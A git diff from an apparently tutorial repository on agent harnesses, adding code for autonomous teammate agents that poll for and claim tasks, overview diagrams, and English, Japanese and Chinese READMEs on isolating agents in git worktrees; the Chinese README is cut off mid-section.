"description": "Write file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "submit_plan", + "description": "Submit a plan for Lead approval.", + "input_schema": {"type": "object", + "properties": {"plan": {"type": "string"}}, + "required": ["plan"]}}, + # s17 new: teammates can list and claim tasks + {"name": "list_tasks", + "description": "List all tasks on the board.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + ] + + def _run_list_tasks(): + tasks = list_tasks() + if not tasks: + return "No tasks." + return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + for t in tasks) + + def _run_claim_task(task_id: str): + return claim_task(task_id, owner=name) + + sub_handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + "submit_plan": lambda plan: _teammate_submit_plan(name, plan), + "list_tasks": _run_list_tasks, + "claim_task": _run_claim_task, + } + + # Outer loop: WORK → IDLE cycle + while True: + # Identity re-injection (s17) + if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) + + # WORK phase + should_shutdown = False + for _ in range(10): + inbox = BUS.read_inbox(name) + for msg in inbox: + stopped = handle_inbox_message(name, msg, messages) + if stopped: + should_shutdown = True + break + if should_shutdown: + break + if inbox and not should_shutdown: + non_protocol = [m for m in inbox + if m.get("type") == "message"] + if non_protocol: + messages.append({"role": "user", + "content": f"{json.dumps(non_protocol)}"}) + + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + + if should_shutdown: + break + + # IDLE phase (s17 new) + found_work = idle_poll(name, messages, name, role) + if not found_work: + break # timeout → shutdown + + # Summary + summary = "Done." + for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + print(f" \033[32m[teammate] {name} finished\033[0m") + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + print(f" \033[36m[teammate] {name} spawned as {role}\033[0m") + return f"Teammate '{name}' spawned as {role} (autonomous)" + + +def _teammate_submit_plan(from_name: str, plan: str) -> str: + """Teammate submits a plan to Lead for approval.""" + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="plan_approval", + sender=from_name, target="lead", + status="pending", payload=plan) + BUS.send(from_name, "lead", plan, + "plan_approval_request", + {"request_id": req_id}) + return f"Plan submitted ({req_id}). Waiting for approval..." + + +# ── Lead Protocol Tools (from s16) ── + +def run_request_shutdown(teammate: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="shutdown", + sender="lead", target=teammate, + status="pending", payload="") + BUS.send("lead", teammate, "Please shut down gracefully.", + "shutdown_request", + {"request_id": req_id}) + print(f" \033[35m[protocol] shutdown_request → {teammate} " + f"({req_id})\033[0m") + return f"Shutdown request sent to {teammate} (req: {req_id})" + + +def run_submit_plan(teammate: str, plan: str) -> str: + """Lead asks a teammate to submit a plan.""" + BUS.send("lead", teammate, f"Please submit a plan for: {plan}", + "message") + return f"Asked {teammate} to submit a plan" + + +def run_review_plan(request_id: str, approve: bool, + feedback: str = "") -> str: + state = pending_requests.get(request_id) + if not state: + return f"Request {request_id} not found" + if state.status != "pending": + return f"Request {request_id} already {state.status}" + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, + feedback or ("Approved" if approve else "Rejected"), + "plan_approval_response", + {"request_id": request_id, "approve": approve}) + icon = "✓" if approve else "✗" + print(f" \033[32m[protocol] plan {icon} ({request_id})\033[0m") + return f"Plan {'approved' if approve else 'rejected'} ({request_id})" + + +# ── Basic tool handlers ── + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." + return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + for t in tasks) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + meta = m.get("metadata", {}) + req_id = meta.get("request_id", "") + tag = f" [{m['type']} req:{req_id}]" if req_id else f" [{m['type']}]" + lines.append(f" [{m['from']}]{tag} {m['content'][:200]}") + return "\n".join(lines) + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a task.", + "input_schema": {"type": "object", + "properties": {"subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "spawn_teammate", + "description": "Spawn an autonomous teammate agent.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "role": {"type": "string"}, + "prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", + "description": "Send message to a teammate.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check inbox for messages and protocol responses.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "request_shutdown", + "description": "Request a teammate to shut down gracefully.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}}, + "required": ["teammate"]}}, + {"name": "submit_plan", + "description": "Ask a teammate to submit a plan for review.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}, + "plan": {"type": "string"}}, + "required": ["teammate", "plan"]}}, + {"name": "review_plan", + "description": "Approve or reject a submitted plan.", + "input_schema": {"type": "object", + "properties": { + "request_id": {"type": "string"}, + "approve": {"type": "boolean"}, + "feedback": {"type": "string"}}, + "required": ["request_id", "approve"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, "check_inbox": run_check_inbox, + "request_shutdown": run_request_shutdown, + "submit_plan": run_submit_plan, "review_plan": run_review_plan, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_team": "teammate" in text or "spawn" in text or + "inbox" in text or "protocol" in text or "shutdown" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else "Unknown" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s17: autonomous agents") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, + "has_team": False, "memories": ""} + while True: + try: + query = input("\033[36ms17 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + + # Check inbox for protocol responses + inbox = BUS.read_inbox("lead") + if inbox: + print(f"\n\033[33m[Inbox: {len(inbox)}]\033[0m") + for msg in inbox: + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + msg_type = msg.get("type", "") + if req_id and msg_type.endswith("_response"): + approve = meta.get("approve", False) + match_response(msg_type, req_id, approve) + else: + print(f" [{msg['from']}] {msg['content'][:200]}") + print() diff --git a/s17_autonomous_agents/images/autonomous-agents-overview.en.svg b/s17_autonomous_agents/images/autonomous-agents-overview.en.svg new file mode 100644 index 000000000..89965d1e0 --- /dev/null +++ b/s17_autonomous_agents/images/autonomous-agents-overview.en.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + + + + Autonomous Agents — Idle Loop + Auto-Claim + WORK/IDLE Lifecycle + + + + s16 Preserved + + s17 New + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (all s16 preserved) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Teammate Lifecycle (s17 new: WORK → IDLE → SHUTDOWN) + + + + WORK Phase + inbox → LLM → bash / read / write + stop_reason == tool_use → loop + stop_reason != tool_use → IDLE + Max 10 rounds / interruptible by shutdown_request + + + + task done + + + + work found + + + + IDLE Phase (poll every 5s) + ├ Check inbox → has message → back to WORK + ├ scan_unclaimed_tasks → claim → back to WORK + └ 60s timeout → SHUTDOWN ↓ + idle_poll() + claim_task() + + + + SHUTDOWN + + + + 60s timeout + + + + + s16: MessageBus + protocols + request_shutdown + plan approval + + s17: idle_poll + scan_unclaimed_tasks + auto_claim + identity re-injection + + + + Lead tools unchanged (13) · Teammate tools 5 → 7 (+list_tasks, claim_task) · Teammates self-claim, Lead only creates tasks + diff --git a/s17_autonomous_agents/images/autonomous-agents-overview.ja.svg b/s17_autonomous_agents/images/autonomous-agents-overview.ja.svg new file mode 100644 index 000000000..9395aca8f --- /dev/null +++ b/s17_autonomous_agents/images/autonomous-agents-overview.ja.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + + + + Autonomous Agents — アイドルポーリング + 自動認領 + WORK/IDLE ライフサイクル + + + + s16 保持 + + s17 新規 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH(s16 全保持) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + チームメイトライフサイクル(s17 新規:WORK → IDLE → SHUTDOWN) + + + + WORK フェーズ + inbox → LLM → bash / read / write + stop_reason == tool_use → ループ + stop_reason != tool_use → IDLE + 最大 10 ラウンド / shutdown_request で中断可能 + + + + タスク完了 + + + + 仕事を発見 + + + + IDLE フェーズ(5 秒ごとにポーリング) + ├ inbox チェック → メッセージあり → WORK に戻る + ├ scan_unclaimed_tasks → 認領 → WORK に戻る + └ 60 秒タイムアウト → SHUTDOWN ↓ + idle_poll() + claim_task() + + + + SHUTDOWN + + + + 60 秒タイムアウト + + + + + s16: MessageBus + protocols + request_shutdown + plan approval + + s17: idle_poll + scan_unclaimed_tasks + auto_claim + identity re-injection + + + + Lead ツール不変(13) · チームメイトツール 5 → 7(+list_tasks, claim_task) · チームメイトが自己認領、Lead はタスク作成のみ + diff --git a/s17_autonomous_agents/images/autonomous-agents-overview.svg b/s17_autonomous_agents/images/autonomous-agents-overview.svg new file mode 100644 index 000000000..8fc15846e --- /dev/null +++ b/s17_autonomous_agents/images/autonomous-agents-overview.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + + + + Autonomous Agents — 空闲循环 + 自动认领 + WORK/IDLE 生命周期 + + + + s16 保留 + + s17 新增 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s16 全保留) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + 队友生命周期(s17 新增:WORK → IDLE → SHUTDOWN) + + + + WORK 阶段 + inbox → LLM → bash / read / write + stop_reason == tool_use → loop + stop_reason != tool_use → IDLE + 最多 10 轮 / 可被 shutdown_request 中断 + + + + 任务完成 + + + + 发现新任务 + + + + IDLE 阶段(每 5s 轮询) + ├ 检查 inbox → 有消息 → 回 WORK + ├ scan_unclaimed_tasks → 认领 → 回 WORK + └ 60s 超时 → SHUTDOWN ↓ + idle_poll() + claim_task() + + + + SHUTDOWN + + + + 60s 超时 + + + + + s16: MessageBus + protocols + request_shutdown + plan approval + + s17: idle_poll + scan_unclaimed_tasks + auto_claim + identity re-injection + + + + Lead 工具不变(13) · 队友工具 5 → 7(+list_tasks, claim_task) · 队友自主认领,Lead 只创建任务 + diff --git a/s18_worktree_isolation/README.en.md b/s18_worktree_isolation/README.en.md new file mode 100644 index 000000000..67121f8da --- /dev/null +++ b/s18_worktree_isolation/README.en.md @@ -0,0 +1,155 @@ +# s18: Worktree Isolation — Separate Directories, No Conflicts + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s16 → s17 → `s18` → [s19](../s19_mcp_plugin/) + +> *"Separate directories, no conflicts"* — Tasks own goals, worktrees own directories, bound by ID. +> +> **Harness layer**: Isolation — Parallel execution channels that never collide. + +--- + +## The Problem + +In s17, Alice and Bob both work in the same directory. Alice's task is "refactor the auth module," Bob's task is "refactor the UI login page." + +Alice runs `write_file("config.py", ...)`. Bob also runs `write_file("config.py", ...)`. Both edit the same file, overwriting each other. And there's no clean rollback — you can't tell which changes belong to whom. + +**A shared filesystem is a disaster for multi-agent collaboration.** s15-s17 solved "who does what" (task system) and "how to communicate" (message bus), but didn't solve "where to work." + +--- + +## The Solution + +![Worktree Overview](images/worktree-overview.en.svg) + +Git worktree lets you create multiple independent working directories within the same repository, each with its own branch. Alice works in `.worktrees/auth-refactor/`, Bob works in `.worktrees/ui-login/` — no conflicts. + +All s17 capabilities preserved (auto-claiming, idle polling, message bus). Three additions: + +| Capability | Purpose | +|------|------| +| create_worktree | Create an independent directory + branch for a task | +| bind_task_to_worktree | Bind a task to its working directory | +| remove_worktree / keep_worktree | Clean up or preserve after completion | + +--- + +## How It Works + +### Creation: Task-Worktree Binding + +```python +WORKTREES_DIR = WORKDIR / ".worktrees" + +def create_worktree(name: str, task_id: int = None) -> str: + """Create a worktree, optionally bound to a task.""" + path = WORKTREES_DIR / name + path.mkdir(parents=True, exist_ok=True) + run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if task_id: + bind_task_to_worktree(task_id, name) + return str(path) + +def bind_task_to_worktree(task_id: int, worktree_name: str): + task = load_task(task_id) + task["worktree"] = worktree_name + if task["status"] == "pending": + task["status"] = "in_progress" + save_task(task) +``` + +Binding rule: one task binds to one worktree. After binding, the task automatically advances to `in_progress` — having a workspace means work has started. + +### Cleanup: Keep or Remove + +After the task is done, two choices: + +```python +def keep_worktree(name: str): + """Preserve the worktree for later manual merge.""" + +def remove_worktree(name: str, complete_task: bool = True): + """Delete the worktree, optionally marking the task complete.""" + wt = load_worktree(name) + run_git(["worktree", "remove", wt["path"], "--force"]) + if complete_task and wt.get("task_id"): + update_task(wt["task_id"], status="completed") +``` + +Keep = preserve the branch for human review before merging to main. Remove = delete directory + delete branch + mark task complete. One cleanup operation. + +### Event Log + +Every lifecycle operation is logged, enabling scene reconstruction after crashes: + +```python +def log_event(event_type: str, worktree_name: str, task_id: int = None): + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") +``` + +Event types: `create`, `remove`, `keep`. Reconstruction logic: read `events.jsonl` line by line, for each worktree take the last event — `create` means it's alive, `remove` means it's cleaned up. + +--- + +## Changes from s17 + +| Component | Before (s17) | After (s18) | +|------|-----------|-----------| +| Working directory | All agents share WORKDIR | Each task gets an independent git worktree | +| Task data | id/subject/status/owner/blockedBy | + worktree field (bound directory) | +| New functions | — | create_worktree, bind_task_to_worktree, remove_worktree, keep_worktree, log_event | +| Isolation method | None | `git worktree add` + independent branch `wt/{name}` | +| Cleanup | Task completion only | keep (preserve branch) / remove (delete + mark complete) | +| Crash recovery | None | events.jsonl lifecycle log | +| Lead tools | 13 (s17) | + create_worktree, remove_worktree, keep_worktree (16) | +| Teammate tools | 7 (s17) | 7 (unchanged, auto-claimed messages include worktree path) | + +--- + +## Try It Out + +```sh +cd learn-claude-code +python s18_worktree_isolation/code.py +``` + +Try this prompt: + +`Create two tasks, then create isolated worktrees for each. Run git status in each worktree to confirm isolation.` + +What to observe: Do the two worktrees' `git status` outputs show different branches? If you modify a file in one worktree, is the other worktree unaffected? + +--- + +## What's Next + +Agent teams can now self-organize in isolated workspaces. But agents' capabilities are limited to the tools we wrote — bash, read, write, glob, task... + +What if users already have their own tools? Like an internal Jira API, a custom deployment system? Should we rewrite everything? + +s19 MCP Plugin → Give agents a plugin system. External tools connect via a standard protocol — agents don't need to know who wrote them. + +
+Deep Dive into CC Source + +CC's worktree system is driven by two tools (`EnterWorktreeTool.ts` 127 lines, `ExitWorktreeTool.ts` 329 lines): + +**EnterWorktree**: Accepts an optional `name` parameter to create a new worktree. When `name` is omitted, a random name is auto-generated. The new worktree's branch name is based on HEAD, created under `.claude/worktrees/`. Each worktree's `/`-separated segment can only contain letters, digits, dots, underscores, and hyphens, max 64 characters. + +**ExitWorktree**: `action: 'keep'` (preserve directory and branch) or `'remove'` (delete both). On remove, if there are uncommitted changes, the tool **refuses** to execute unless `discard_changes: true` is set — a safety mechanism to prevent losing work. + +**Isolation**: The `isolation: 'worktree'` parameter on AgentTool lets sub-agents run in a worktree. This is an isolation mode for forked sub-agents (analyzed in s06). + +**isDestructive**: ExitWorktree's `isDestructive(input)` returns `input.action === 'remove'` — only flagged as destructive when actually deleting (one of the few tools in CC that overrides isDestructive, see s03 analysis). + +**Tutorial vs CC Key Difference**: The tutorial implements bidirectional task-worktree binding (Task data adds a `worktree` field). CC **does not have this mechanism**. CC's worktree state is managed via `PersistedWorktreeSession` (`utils/sessionStorage.ts`), with fields including `originalCwd`, `worktreePath`, `worktreeName`, `worktreeBranch`, `originalBranch`, `originalHeadCommit`, `sessionId`, `tmuxSessionName`, `hookBased` — no taskId. State is written to the current session's transcript file (type: `'worktree-state'`) via `saveWorktreeState()`, not a separate file. The tutorial uses `events.jsonl` for lifecycle events; CC uses session transcript + sessionStorage. + +
+ + diff --git a/s18_worktree_isolation/README.ja.md b/s18_worktree_isolation/README.ja.md new file mode 100644 index 000000000..e39cc7165 --- /dev/null +++ b/s18_worktree_isolation/README.ja.md @@ -0,0 +1,155 @@ +# s18: Worktree Isolation — それぞれのディレクトリ、互いに干渉しない + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s16 → s17 → `s18` → [s19](../s19_mcp_plugin/) + +> *"それぞれのディレクトリ、互いに干渉しない"* — タスクは目標を管理、worktree はディレクトリを管理、ID で紐付ける。 +> +> **Harness 層**: 隔離 — 決して衝突しない並列実行チャネル。 + +--- + +## 課題 + +s17 では、Alice と Bob は同じディレクトリで作業している。Alice のタスクは「認証モジュールのリファクタリング」、Bob のタスクは「UI ログインページのリファクタリング」。 + +Alice が `write_file("config.py", ...)` を実行。Bob も `write_file("config.py", ...)` を実行。二人が同じファイルを編集し、互いに上書きする。しかもクリーンなロールバックができない — どの変更が誰のものか区別できない。 + +**共有ファイルシステムはマルチ Agent 協作の災難。** s15-s17 は「誰が何をするか」(タスクシステム)と「どう通信するか」(メッセージバス)を解決したが、「どこで作業するか」は解決していなかった。 + +--- + +## ソリューション + +![Worktree Overview](images/worktree-overview.ja.svg) + +Git worktree は同じリポジトリ内に複数の独立した作業ディレクトリを作成でき、それぞれが独自のブランチを持つ。Alice は `.worktrees/auth-refactor/` で作業、Bob は `.worktrees/ui-login/` で作業 — 互いに干渉しない。 + +s17 の全機能を保持(自動認領、空き時ポーリング、メッセージバス)。3 つの追加: + +| 能力 | 目的 | +|------|------| +| create_worktree | タスク用に独立ディレクトリ + 独立ブランチを作成 | +| bind_task_to_worktree | タスクと作業ディレクトリを紐付け | +| remove_worktree / keep_worktree | 完了後にクリーンアップまたは保持 | + +--- + +## 仕組み + +### 作成:タスク-Worktree 紐付け + +```python +WORKTREES_DIR = WORKDIR / ".worktrees" + +def create_worktree(name: str, task_id: int = None) -> str: + """worktree を作成、オプションでタスクに紐付け。""" + path = WORKTREES_DIR / name + path.mkdir(parents=True, exist_ok=True) + run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if task_id: + bind_task_to_worktree(task_id, name) + return str(path) + +def bind_task_to_worktree(task_id: int, worktree_name: str): + task = load_task(task_id) + task["worktree"] = worktree_name + if task["status"] == "pending": + task["status"] = "in_progress" + save_task(task) +``` + +紐付けルール:1 つのタスクに 1 つの worktree を紐付ける。紐付け後、タスクは自動的に `in_progress` に進む — 作業スペースができた = 作業開始。 + +### 片付け:Keep または Remove + +タスク完了後、2 つの選択肢: + +```python +def keep_worktree(name: str): + """worktree を保持、後で手動マージ。""" + +def remove_worktree(name: str, complete_task: bool = True): + """worktree を削除、オプションでタスクを完了マーク。""" + wt = load_worktree(name) + run_git(["worktree", "remove", wt["path"], "--force"]) + if complete_task and wt.get("task_id"): + update_task(wt["task_id"], status="completed") +``` + +Keep = ブランチを保持し、人力レビュー後にメインブランチにマージ。Remove = ディレクトリ削除 + ブランチ削除 + タスク完了マーク。1 回の片付け操作。 + +### イベントログ + +各ライフサイクル操作をログに記録し、クラッシュ後の現場再建が可能: + +```python +def log_event(event_type: str, worktree_name: str, task_id: int = None): + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") +``` + +イベントタイプ:`create`、`remove`、`keep`。再建ロジック:`events.jsonl` を 1 行ずつ読み、各 worktree の最後のイベントを取得 — `create` なら生存中、`remove` ならクリーンアップ済み。 + +--- + +## s17 からの変更 + +| コンポーネント | 変更前 (s17) | 変更後 (s18) | +|--------------|------------|------------| +| 作業ディレクトリ | 全 Agent が WORKDIR を共有 | 各タスクが独立 git worktree | +| Task データ | id/subject/status/owner/blockedBy | + worktree フィールド(紐付けディレクトリ) | +| 新規関数 | — | create_worktree, bind_task_to_worktree, remove_worktree, keep_worktree, log_event | +| 隔離方式 | なし | `git worktree add` + 独立ブランチ `wt/{name}` | +| 片付け | タスク完了のみ | keep(ブランチ保持)/ remove(削除+完了マーク) | +| クラッシュリカバリ | なし | events.jsonl ライフサイクルログ | +| Lead ツール | 13 (s17) | + create_worktree, remove_worktree, keep_worktree (16) | +| チームメイトツール | 7 (s17) | 7(変更なし、auto-claimed メッセージに worktree パスが付加) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s18_worktree_isolation/code.py +``` + +以下のプロンプトを試してください: + +`Create two tasks, then create isolated worktrees for each. Run git status in each worktree to confirm isolation.` + +観察ポイント:2 つの worktree の `git status` 出力は異なるブランチを表示しているか?片方の worktree でファイルを変更しても、もう片方に影響はないか? + +--- + +## 次の章 + +Agent チームは孤立した作業スペースで自己組織化できるようになった。しかし Agent の能力は、我々が書いたツールに制限される — bash、read、write、glob、task... + +もしユーザーがすでに自分のツールを持っていたら?例えば社内 Jira API、独自のデプロイシステム?一から書き直すべきか? + +s19 MCP Plugin → Agent にプラグインシステムを装備。外部ツールが標準プロトコルで接続、Agent は誰が書いたかを知る必要がない。 + +
+CC ソースコード深掘り + +CC の worktree システムは 2 つのツールで駆動(`EnterWorktreeTool.ts` 127 行、`ExitWorktreeTool.ts` 329 行): + +**EnterWorktree**:オプションの `name` パラメータで新しい worktree を作成。`name` を省略するとランダム名を自動生成。新しい worktree のブランチ名は HEAD をベースに、`.claude/worktrees/` に作成。各 worktree の `/` 区切りセグメントは英字、数字、ドット、アンダースコア、ハイフンのみ、最大 64 文字。 + +**ExitWorktree**:`action: 'keep'`(ディレクトリとブランチを保持)または `'remove'`(両方を削除)。Remove 時、未コミットの変更がある場合、`discard_changes: true` を設定しない限りツールは**実行を拒否** — 作業喪失を防ぐ安全機構。 + +**Isolation**:AgentTool の `isolation: 'worktree'` パラメータにより、サブ Agent が worktree 内で実行。これは fork subagent(s06 で分析)の隔離モード。 + +**isDestructive**:ExitWorktree の `isDestructive(input)` は `input.action === 'remove'` を返す — 実際に削除する時のみ destructive としてマーク(CC で isDestructive をオーバーライドしている数少ないツールの一つ、s03 分析を参照)。 + +**チュートリアル版 vs CC の主要な違い**:チュートリアル版は task-worktree の双方向バインディングを実装(Task データに `worktree` フィールドを追加)。CC **にはこの仕組みがない**。CC の worktree 状態は `PersistedWorktreeSession`(`utils/sessionStorage.ts`)で管理、フィールドには `originalCwd`、`worktreePath`、`worktreeName`、`worktreeBranch`、`originalBranch`、`originalHeadCommit`、`sessionId`、`tmuxSessionName`、`hookBased` がある — taskId はない。状態は `saveWorktreeState()` で現在のセッションの transcript ファイルに書き込まれる(type: `'worktree-state'`)、独立したファイルではない。チュートリアル版は `events.jsonl` でライフサイクルイベントを記録、CC は session transcript + sessionStorage。 + +
+ + diff --git a/s18_worktree_isolation/README.md b/s18_worktree_isolation/README.md new file mode 100644 index 000000000..595133c50 --- /dev/null +++ b/s18_worktree_isolation/README.md @@ -0,0 +1,155 @@ +# s18: Worktree Isolation — 各干各的,互不干扰 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s16 → s17 → `s18` → [s19](../s19_mcp_plugin/) + +> *"各干各的目录, 互不干扰"* — 任务管目标, worktree 管目录, 按 ID 绑定。 +> +> **Harness 层**: 隔离 — 永不碰撞的并行执行通道。 + +--- + +## 问题 + +s17 中,Alice 和 Bob 都在同一个目录下工作。Alice 的任务是"重构认证模块",Bob 的任务是"重构 UI 登录页"。 + +Alice `write_file("config.py", ...)`。Bob 也 `write_file("config.py", ...)`。两个人改同一个文件,互相覆盖。而且无法干净地回滚——分不清哪些改动是谁的。 + +**共享文件系统是多 Agent 协作的灾难。** s15-s17 解决了"谁干什么"(任务系统)和"怎么通信"(消息总线),但没解决"在哪干"。 + +--- + +## 解决方案 + +![Worktree Overview](images/worktree-overview.svg) + +Git worktree 让你在同一仓库中创建多个独立的工作目录,每个有自己的分支。Alice 在 `.worktrees/auth-refactor/` 下工作,Bob 在 `.worktrees/ui-login/` 下工作——互不干扰。 + +s17 的全部能力保留(自主认领、空闲轮询、消息总线)。新增三样: + +| 能力 | 作用 | +|------|------| +| create_worktree | 为任务创建独立目录 + 独立分支 | +| bind_task_to_worktree | 把任务和工作目录绑定 | +| remove_worktree / keep_worktree | 完成后清理或保留 | + +--- + +## 工作原理 + +### 创建:任务-Worktree 绑定 + +```python +WORKTREES_DIR = WORKDIR / ".worktrees" + +def create_worktree(name: str, task_id: int = None) -> str: + """创建 worktree,可选绑定到任务。""" + path = WORKTREES_DIR / name + path.mkdir(parents=True, exist_ok=True) + run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if task_id: + bind_task_to_worktree(task_id, name) + return str(path) + +def bind_task_to_worktree(task_id: int, worktree_name: str): + task = load_task(task_id) + task["worktree"] = worktree_name + if task["status"] == "pending": + task["status"] = "in_progress" + save_task(task) +``` + +绑定规则:一个任务绑定一个 worktree。绑定后任务自动推进到 `in_progress`——任务有了自己的工作空间,等于开工了。 + +### 收尾:Keep 还是 Remove + +任务完成后,两个选择: + +```python +def keep_worktree(name: str): + """保留 worktree,后续手动合并。""" + +def remove_worktree(name: str, complete_task: bool = True): + """删除 worktree,可选标记任务完成。""" + wt = load_worktree(name) + run_git(["worktree", "remove", wt["path"], "--force"]) + if complete_task and wt.get("task_id"): + update_task(wt["task_id"], status="completed") +``` + +Keep = 留着分支,等人工 review 后合并到主分支。Remove = 删目录 + 删分支 + 标记任务完成。一次收尾。 + +### 事件流 + +每次生命周期操作写入日志,崩溃后可重建现场: 